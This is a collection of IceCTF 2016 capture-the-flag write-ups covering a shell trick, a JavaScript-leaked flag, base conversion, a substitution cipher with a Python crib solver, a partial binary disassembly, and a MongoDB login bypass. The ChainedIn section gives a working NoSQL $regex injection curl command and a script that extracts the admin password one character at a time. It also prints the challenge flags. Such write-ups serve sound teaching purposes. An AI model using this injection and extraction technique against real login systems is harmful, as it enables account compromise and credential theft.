IceCTF 2016 More Challs by Birdy42

Demo

So I didn’t know what the basename function did and didn’t want to spend a lot of time reading the docs.

I updated the original script to print what basename would return.

  mkdir /tmp/bi
  cd /tmp/bi
  cp /home/demo/demo.c /tmp/bi
  vi /tmp/bi/demo.c

I added a printf of basename’s return value and it printed:

  demo

So I realized we just had to make the basename match icesh, so I created a shell script:

  vi /tmp/bi/icesh

  #!/bin/sh
  /home/demo/demo

Then I ran it and got the shell.

IceCTF 2016 Many Challs by Makhno

Spotlight (Web · 10 pt)

We get access to http://spotlight.vuln.icec.tf/: a black page, but when you move the mouse a halo of light appears.

Analyzing with Firebug:

spotlight.js => console.log("DEBUG: IceCTF{5tup1d_d3v5_w1th_th31r_l095}"); The flag is:

IceCTF{5tup1d_d3v5_w1th_th31r_l095}

All your Base are belong to us (Misc · 15 pt)

Got a binary file; just translate it to ASCII aaaaaand it’s done!

IceCTF{al1_my_bases_are_yours_and_all_y0ur_bases_are_mine}

IceCTF 2016 Substituted

We got a substitute flag, I hear they are pretty lax on the rules…

Lw!

Gyzvecy ke WvyVKT!

W'zz by reso dsbdkwksky tzjq teo kly ujr. Teo keujr, gy joy dksurwmq bjdwv vorakeqojalr jmu wkd jaazwvjkwemd.
Vorakeqojalr ljd j zemq lwdkeor, jzklesql gwkl kly juxymk et vecaskyod wk ljd qekkym oyjzzr vecazwvjkyu.
Decy dwcazy ezu vwalyod joy kly Vjydjo vwalyo, kly Xwqymyoy vwalyo, kly dsbdkwkskwem vwalyo, glwvl wd klwd emy, jmu de em.
Jzcedk jzz et klydy vwalyod joy yjdwzr boeiym keujr gwkl kly lyza et vecaskyod.
Decy myg ymvorakwem cykleud joy JYD, kly vsooymk dkjmujou teo ymvorakwem, jzemq gwkl ODJ.
Vorakeqojalr wd j xjdk twyzu jmu wd xyor wmkyoydkwmq klesql.
De iwvi bjvi, oyju sa em decy veez vwalyod jmu ljxy tsm!

El jmu teo reso oyveoud cr mjcy wd WvyVKT{jzgjrd_zwdkym_ke_reso_dsbdkwksky_tzjqd}.

I tried to find a known substitution method, but that failed, so I started from the following observation:

  WvyVKT = IceCTF

From this, I gathered that Gyzvecy was “Welcome”; then, by hand, I found the flag IceCTF{always_listen_to_your_substitute_flags}
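As an added example (not part of eilco’s write-up), here is a small Python crib-based solver that does the “by hand” step systematically: it builds a cipher-to-plain letter map from the two cribs the write-up states, rejects any crib that contradicts an earlier one, and prints the partial decryption with unrecovered letters shown as “?”. The extra words in HAND_CRIBS are assumed guesses of the kind the partial decryption makes obvious (the, and, for, your, …); they are not from the page.

```python
import re

# Ciphertext from the challenge, copied from the write-up above.
CIPHERTEXT = """Lw!

Gyzvecy ke WvyVKT!

W'zz by reso dsbdkwksky tzjq teo kly ujr. Teo keujr, gy joy dksurwmq bjdwv vorakeqojalr jmu wkd jaazwvjkwemd.
Vorakeqojalr ljd j zemq lwdkeor, jzklesql gwkl kly juxymk et vecaskyod wk ljd qekkym oyjzzr vecazwvjkyu.
Decy dwcazy ezu vwalyod joy kly Vjydjo vwalyo, kly Xwqymyoy vwalyo, kly dsbdkwkskwem vwalyo, glwvl wd klwd emy, jmu de em.
Jzcedk jzz et klydy vwalyod joy yjdwzr boeiym keujr gwkl kly lyza et vecaskyod.
Decy myg ymvorakwem cykleud joy JYD, kly vsooymk dkjmujou teo ymvorakwem, jzemq gwkl ODJ.
Vorakeqojalr wd j xjdk twyzu jmu wd xyor wmkyoydkwmq klesql.
De iwvi bjvi, oyju sa em decy veez vwalyod jmu ljxy tsm!

El jmu teo reso oyveoud cr mjcy wd WvyVKT{jzgjrd_zwdkym_ke_reso_dsbdkwksky_tzjqd}."""

# The two cribs the write-up states.
PAGE_CRIBS = [("WvyVKT", "IceCTF"), ("Gyzvecy", "Welcome")]

# Assumed further cribs: short English words the partial decryption makes
# obvious. These are guesses of the kind made "by hand", not from the page.
HAND_CRIBS = PAGE_CRIBS + [
    ("kly", "the"), ("jmu", "and"), ("teo", "for"), ("reso", "your"),
    ("dsbdkwksky", "substitute"), ("tzjq", "flag"),
]


def build_key(cribs):
    """Turn (cipher_word, plain_word) pairs into a cipher->plain letter map.

    Raises ValueError when a crib contradicts an earlier one (a cipher letter
    mapping to two plain letters, or two cipher letters to one plain letter);
    that is how a wrong guess shows up.
    """
    key, inverse = {}, {}
    for cipher_word, plain_word in cribs:
        if len(cipher_word) != len(plain_word):
            raise ValueError(f"length mismatch: {cipher_word!r} vs {plain_word!r}")
        for c, p in zip(cipher_word.lower(), plain_word.lower()):
            if not c.isalpha():
                continue  # punctuation such as { } _ is not substituted
            if key.get(c, p) != p or inverse.get(p, c) != c:
                raise ValueError(f"contradiction: {c!r} -> {p!r}")
            key[c] = p
            inverse[p] = c
    return key


def is_consistent(cribs):
    """True if the cribs can all hold at once under one substitution."""
    try:
        build_key(cribs)
        return True
    except ValueError:
        return False


def decrypt(text, key):
    """Apply a (possibly partial) key; letters not yet recovered become '?'."""
    out = []
    for ch in text:
        low = ch.lower()
        if low in key:
            p = key[low]
            out.append(p.upper() if ch.isupper() else p)
        elif ch.isalpha():
            out.append("?")
        else:
            out.append(ch)
    return "".join(out)


def find_flag(text):
    """Pull the IceCTF{...} token out of a (partially) decrypted text."""
    m = re.search(r"IceCTF\{[^}]*\}", text)
    return m.group(0) if m else None


if __name__ == "__main__":
    print(decrypt(CIPHERTEXT, build_key(PAGE_CRIBS)))   # shows the '?' gaps
    print(find_flag(decrypt(CIPHERTEXT, build_key(HAND_CRIBS))))
```

Running it with only PAGE_CRIBS already turns the greeting into “Welcome to IceCTF!” and leaves question marks elsewhere, which is the state from which the rest of the words are guessed; each guess goes into the crib list and is rejected immediately if it conflicts with the key so far.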

Done!

By eilco

IceCTF 2016 Dear Diary

First thing: objdump -d diary

0804863d <flag>:
 804863d:       55                      push   %ebp
 804863e:       89 e5                   mov    %esp,%ebp
 8048640:       83 ec 28                sub    $0x28,%esp
 8048643:       65 a1 14 00 00 00       mov    %gs:0x14,%eax
 8048649:       89 45 f4                mov    %eax,-0xc(%ebp)
 804864c:       31 c0                   xor    %eax,%eax
 804864e:       c7 44 24 04 00 00 00    movl   $0x0,0x4(%esp)
 8048655:       00
 8048656:       c7 04 24 40 89 04 08    movl   $0x8048940,(%esp)
 804865d:       e8 9e fe ff ff          call   8048500 <open@plt>
 8048662:       89 45 f0                mov    %eax,-0x10(%ebp)
 8048665:       c7 44 24 08 00 01 00    movl   $0x100,0x8(%esp)
 804866c:       00
 804866d:       c7 44 24 04 a0 a0 04    movl   $0x804a0a0,0x4(%esp)
 8048674:       08
 8048675:       8b 45 f0                mov    -0x10(%ebp),%eax
 8048678:       89 04 24                mov    %eax,(%esp)
 804867b:       e8 00 fe ff ff          call   8048480 <read@plt>
 8048680:       8b 45 f4                mov    -0xc(%ebp),%eax
 8048683:       65 33 05 14 00 00 00    xor    %gs:0x14,%eax
 804868a:       74 05                   je     8048691 <flag+0x54>
 804868c:       e8 2f fe ff ff          call   80484c0 <__stack_chk_fail@plt>
 8048691:       c9                      leave
 8048692:       c3                      ret

There is a routine called “flag” which opens flag.txt and reads up to 0x100 bytes of it into the buffer at 0x804a0a0.

Let’s run gdb

IceCTF 2016 ChainedIn

ChainedIn WU

First, we can see that the website uses MongoDB, thanks to the logo.

Analyzing with Firebug, we can see that the data is sent as JSON.

So I try injecting a login as admin; the password should be the flag, and it should begin with “IceCTF{”:

ghozt@maze:~/ice/chained$ curl -H "Content-Type: application/json" -X POST -d '{"user":"admin","pass":{"$regex":"IceCTF{"}}' http://chainedin.vuln.icec.tf/login

It works! Let’s script!
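As an added example (not part of the original write-up), here is the kind of script the next step calls for: it turns the $regex check from the curl request into a character-by-character oracle, anchoring each probe at the start of the password and escaping regex metacharacters so that “{” or “_” are matched literally. The challenge server is not reachable offline, so fake_login is a constructed stand-in with a made-up secret; http_oracle shows how the same probe would be posted to http://chainedin.vuln.icec.tf/login, and its success check is an assumption to adapt to the real response.

```python
import re
import string

# Constructed stand-in for the vulnerable login. The secret is made up for
# this example and is not the real flag.
FAKE_SECRET = "IceCTF{m0ng0_r3g3x_0racl3}"


def fake_login(payload):
    """Behave like a MongoDB query built straight from untrusted JSON:
    {"user": <user>, "pass": <pass>} where <pass> may be an operator object.

    Returns True when the query matches, which is what a successful login
    response told the attacker in the real challenge.
    """
    if payload.get("user") != "admin":
        return False
    password = payload.get("pass")
    if isinstance(password, dict) and "$regex" in password:
        # MongoDB's $regex is an unanchored search, like re.search
        return re.search(password["$regex"], FAKE_SECRET) is not None
    return password == FAKE_SECRET


def http_oracle(payload, url="http://chainedin.vuln.icec.tf/login"):
    """Oracle against the real server (not used offline).

    Assumption: a successful login is distinguishable in the response body;
    the marker below is a placeholder to adapt to what the server returns.
    """
    import requests
    response = requests.post(url, json=payload)
    return "success" in response.text.lower()  # assumed marker


# Candidate characters; the real flag alphabet is unknown, so include the
# usual flag characters plus the closing brace that ends the search.
ALPHABET = string.ascii_letters + string.digits + "_{}!?"


def extract_password(oracle, prefix="IceCTF{", alphabet=ALPHABET, max_len=80):
    """Recover the password one character at a time.

    Each probe is anchored with ^ so only the exact known prefix matches, and
    the candidate is escaped so the braces and underscores in the flag are
    compared literally rather than as regex syntax.
    """
    known = prefix
    while len(known) < max_len and not known.endswith("}"):
        for ch in alphabet:
            probe = {"user": "admin",
                     "pass": {"$regex": "^" + re.escape(known + ch)}}
            if oracle(probe):
                known += ch
                break
        else:
            break  # nothing extends the prefix; the alphabet may be incomplete
    return known


if __name__ == "__main__":
    print(extract_password(fake_login))
```

Swap fake_login for http_oracle to run it against the challenge; the first probe is the same JSON as the curl command above, and the loop simply sends one request per candidate character until it sees the closing brace.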